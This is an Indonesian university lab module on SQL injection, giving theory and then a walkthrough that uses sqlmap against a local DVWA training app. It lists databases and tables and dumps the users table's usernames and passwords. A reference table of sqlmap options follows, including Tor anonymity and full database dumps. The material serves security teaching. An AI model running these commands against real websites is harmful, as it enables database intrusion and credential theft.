2016 Modul Praktikum Keamanan Sistem LABORATORIUM SECURITY SY STEM Hanya dipergunakan di lingkungan Fakultas Teknik Elektro K K KEAMANAN SISTEM FAKULTAS TEKNIK ELEKTRO UNIVERSITAS TELKOM
DAFTAR PENYUSUN Yudha Purwanto,S.T.,M.T. Surya MIchrandi Nasution,S.T.,M.T. Dll Modul Praktikum Keamanan Sistem 1
LEMBAR PERNYATAAN Yang bertanda tangan dibawah ini : Nama : Surya Michrandi Nasution,S.T.,M.T. NIK : 13861155-1 Jabatan : Dosen Pembina Laboratorium Security System Menerangkan dengan sesungguhnya bahwa modul praktikum ini telah direview dan akan digunakan untuk pelaksanaan praktikum di Semester 5 Tahun Akademik 2016/2017 di Laboratorium Rangkaian Listrik Fakultas Teknik Elektro Universitas Telkom Bandung, 10 Agustus 2016 Mengetahui, Dosen Pembina Lab Ketua Kelompok Keahlian Security System Yudha Purwanto,S.T.,M.T. Surya Michrandi Nasution,S.T.,M.T. NIK 02770281-1 NIK 13681155-1 Modul Praktikum Keamanan Sistem 2
Visi & Misi Fakultas Teknik Elektro VISI: Menjadi fakultas unggul berkelas dunia yang berperan aktif pada pengembangan ilmu pengetahuan dan teknologi elektro serta fisika, berbasis teknologi informasi dan komunikasi. MISI: 1. Menyelenggarakan pendidikan tinggi dan pendidikan berkelanjutan berstandar internasional 2. Mengembangkan, menyebarluaskan, dan memanfaatkan ilmu pengetahuan dan teknologi bidang teknik telekomunikasi, teknik komputer, fisika teknik, dan elektroteknik, serta bekerja sama dengan industri/institusi, guna meningkatkan kesejahteraan dan kemajuan masyarakat. 3. Mengembangkan dan membina jejaring dengan perguruan tinggi dan industri terkemuka dalam dan luar negeri dalam rangka kerjasama pendidikan dan penelitian. 4. Mengembangkan sumberdaya untuk mencapai keunggulan dalam pembelajaran, penelitian dan pengabdian kepada masyarakat. Modul Praktikum Keamanan Sistem 3
Visi & Misi Fakultas Teknik Elektro VISI: Menjadi program studi berstandar internasional dan menghasilkan sarjana berkeahlian Sistem Elektronika, Sistem Kendali, atau Teknik Biomedika MISI: 1. Menyelenggarakan pendidikan berstandar internasional untuk menghasilkan lulusan yang menguasai ilmu pengetahuan dan teknologi Sistem Elektronika, Sistem Kendali, atau Teknik Biomedika; 2. Mengembangkan dan menyebarluaskan ilmu pengetahuan dan teknologi Sistem Elektronika, Sistem Kendali, dan Teknik Biomedika yang diakui secara internasional dengan melibatkan mahasiswa secara aktif; 3. Memanfaatkan ilmu pengetahuan dan teknologi Sistem Elektronika, Sistem Kendali, dan Teknik Biomedika untuk kesejahteraan dan kemajuan peradaban bangsa. Modul Praktikum Keamanan Sistem 4
ATURAN LABORATORIUM FAKULTAS TEKNIK ELEKTRO TELKOM UNIVERSITY Setiap Mahasiswa Fakultas Teknik Elektro yang akan menggunakan Fasilitas Laboratorium, WAJIB mematuhi Aturan sebagai berikut : 1. Menggunakan seragam resmi Telkom University, dan Membawa Kartu Tanda Mahasiswa (KTM) yang masih berlaku. 2. Tidak berambut gondrong untuk mahasiswa 3. Dilarang merokok dan makan minum didalam ruangan, dan membuang sampah pada tempatnya 4. Dilarang menyimpan barang-barang milik pribadi di Laboratorium tanpa seijin Fakultas 5. Dilarang menginap di Laboratorium tanpa seijin Fakultas 6. Jam Kerja Laboratorium dan Ruang Riset adalah 06.30 WIB sampai 22.00 WIB 7. Mahasiswa yang akan menggunakan Laboratorium dan atau ruang riset diluar jam kerja, harus mengajukan ijin kepada Fakultas Dekan Fakultas Teknik Elektro Bandung,.. Juli 2014 Dr. Rina Pudjiastuti, Ir., MT. Modul Praktikum Keamanan Sistem 5
Modul 3 : SQL injection 0.1 Tujuan Setelah mengikuti praktikum ini mahasiswa diharapkan dapat: 1. Mengetahui apa itu SQL Injection 2. Mengetahui beberapa cara melakukan SQL Injection 0.2 Alat & Bahan 1. Komputer PC Dasar Teori 1. SQL SQL (Structured Query Language) SQL digunakan untuk berkomunikasi dengan database. SQL adalah bahasa standar untuk sistem manajemen basis data relasional. Pernyataan SQL digunakan untuk melakukan tugas seperti update data pada database, atau mengambil data dari database. 2. SQL Injection Injeksi SQL atau SQL Injection adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. Modul Praktikum Keamanan Sistem 6
Exploitasi Sebelum mulai akan dijelaskan sedikit mengenai tool yang akan kita gunakan, dalam pembahasan ini kita akan menggunakan tool Sqlmap Beberapa Feature dari Sqlmap sebagai berikut: Support database MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix. Full support untuk 6 teknik SQL injection: boolean-based blind, time-based blind, errorbased, UNION query-based, stacked queries and out-of-band. Langsung terkoneksi dengan database tanpa melalui SQL injection, Dengan menyediakan kredensial DBMS, alamat IP, port dan nama database. Pengenalan Password format hash secara otomatis and support untuk cracking dengan menggunakan dictionary-based attack. Bisa melakukan Dump isi dari sebuah database. SQLmap adalah program opensource yang di buat dari Python untuk melakukan proses mendeteksi dan mengexploit celah keamanan SQL secara otomatis Modul Praktikum Keamanan Sistem 7
Setelah mengetahui Kegunaan dari Sqlmap kita lanjut ke praktikum,kali ini kita akan mengambil isi table dari sebuah website local dengan menggunakan Sqlmap Pertama kita perlu mencari url yang bisa di exploit dengan mencari url yang di gunakan untuk query server melalui tamper data Catatan : Browser memerlukan Extension Tamper data untuk melihat url query server Klik Start Temper lalu masukan 1 dan submit pada website Modul Praktikum Keamanan Sistem 8
Setelah Submit data Copy isi Referer dan COOKIE ke dalam notepad, Referer akan di gunakan sebagai Url Masuk dan COOKIE sebagai Credential COOKIE di sini di ambil untuk mendapatkan session agar sqlmap bisa melakukan injeksi melalui session yang sudah ada, COOKIE pada umumnya menyimpan pengaturan atau preferensi dari situs berangkutan ddengan COOKIE situs dapat menampilkan informasi yang sesuai dengan pengaturan computer, umumnya COOKIE menyimpan data session user dan informai yang terkait user tersebut, di sini cookie menyimpan data PHPSESSID yaitu session user dan juga tingkat security level dari website Masukan Referer dan COOKIE untuk melihat isi database Python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="phpsessid=t3cdvsu9cqn8kafoseegh5esqe; security=low" --dbs Modul Praktikum Keamanan Sistem 9
Berikut Adalah Isi Database yang ada di dalam website Setelah mendapatkan table kita akan mencari Tabel isi dari Database dvwa Python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="phpsessid=t3cdvsu9cqn8kafoseegh5esqe; security=low" -D dvwa --tables Berikut Tabel Isi dari Database dvwa Setelah mendapatkan semua table kita akan mencari kolom dari table Python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="phpsessid=t3cdvsu9cqn8kafoseegh5esqe; security=low" -D dvwa -T users --columns Modul Praktikum Keamanan Sistem 10
Setelah kita tahu bentuk isi dari Databse sekarang kita akan melakukan dump isi dari table Python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&submit=submit" -- cookie="phpsessid=t3cdvsu9cqn8kafoseegh5esqe; security=low" -D dvwa -T users -C user,password --dump Berikut merupakan isi colom user dan password Modul Praktikum Keamanan Sistem 11
Perintah Fungsi -h /--help Menampilkan menu Help pada Sqlmap -d Melakukan Koneksi database langsung -u Target Alamat -m Scan banyak target yang ada di dalam file text -c Menampilkan option dari configuration INI file --cookie Memasukan Header HTTP cookie --referer Memasukan Header HTTP referer --tor Menggunakan tor untuk anonimitas network --hostname Menampilkan hostname dari server --users Menampilkan Users database --passwords Menampilkan password hash pada database --dbs Memunculkan database --columns Memunculkan columns dalam databse --tables Memunculkan tables dalam database --dump Melakukan dump dari database table yang dipilih --dump-all Melakukan dump dari semua database table --search Mencari columns, table, dan/atau nama database --update Update sqlmap Modul Praktikum Keamanan Sistem 12